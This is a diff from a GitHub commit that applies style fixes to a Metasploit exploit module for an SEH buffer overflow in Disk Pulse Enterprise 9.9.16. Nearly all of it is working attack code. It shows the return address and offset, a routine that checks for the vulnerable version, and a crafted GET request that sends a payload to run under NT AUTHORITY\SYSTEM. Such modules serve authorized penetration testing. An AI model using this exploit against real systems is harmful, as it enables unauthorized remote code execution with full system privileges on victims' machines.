33# Current source: https://github.com/rapid7/metasploit-framework
44##
55
6- require 'msf/core'
7-
86class MetasploitModule < Msf ::Exploit ::Remote
97 Rank = ExcellentRanking
108
@@ -14,12 +12,12 @@ class MetasploitModule < Msf::Exploit::Remote
1412 def initialize ( info = { } )
1513 super ( update_info ( info ,
1614 'Name' => 'Disk Pulse Enterprise GET Buffer Overflow' ,
17- 'Description' => %q{
15+ 'Description' => %q(
1816 This module exploits an SEH buffer overflow in Disk Pulse Enterprise
1917 9.9.16. If a malicious user sends a crafted HTTP GET request
2018 it is possible to execute a payload that would run under the Windows
2119 NT AUTHORITY\SYSTEM account.
22- } ,
20+ ) ,
2321 'License' => MSF_LICENSE ,
2422 'Author' =>
2523 [
@@ -46,24 +44,22 @@ def initialize(info = {})
4644 {
4745 'Ret' => 0x1013ADDD , # POP EDI POP ESI RET 04 -- libpal.dll
4846 'Offset' => 2492
49- }
50- ] ,
47+ } ]
5148 ] ,
5249 'Privileged' => true ,
5350 'DisclosureDate' => 'Aug 25 2017' ,
5451 'DefaultTarget' => 0 ) )
5552
56- register_options ( [ Opt ::RPORT ( 80 ) ] , self . class )
57-
53+ register_options ( [ Opt ::RPORT ( 80 ) ] )
5854 end
5955
6056 def check
61- res = send_request_cgi ( {
62- 'uri' => '/' ,
63- 'method' => 'GET'
64- } )
57+ res = send_request_cgi (
58+ 'uri' => '/' ,
59+ 'method' => 'GET'
60+ )
6561
66- if res and res . code == 200 and res . body =~ /Disk Pulse Enterprise v9\. 9\. 16/
62+ if res && res . code == 200 && res . body =~ /Disk Pulse Enterprise v9\. 9\. 16/
6763 return Exploit ::CheckCode ::Appears
6864 end
6965
@@ -83,15 +79,14 @@ def exploit
8379
8480 print_status ( "Sending exploit..." )
8581
86- res = send_request_cgi ( {
87- 'uri' => '/../' + exp ,
88- 'method' => 'GET' ,
89- 'host' => '4.2.2.2' ,
90- 'connection' => 'keep-alive'
91- } )
92-
93- handler
94- disconnect
82+ send_request_cgi (
83+ 'uri' => '/../' + exp ,
84+ 'method' => 'GET' ,
85+ 'host' => '4.2.2.2' ,
86+ 'connection' => 'keep-alive'
87+ )
9588
89+ handler
90+ disconnect
9691 end
9792end
0 commit comments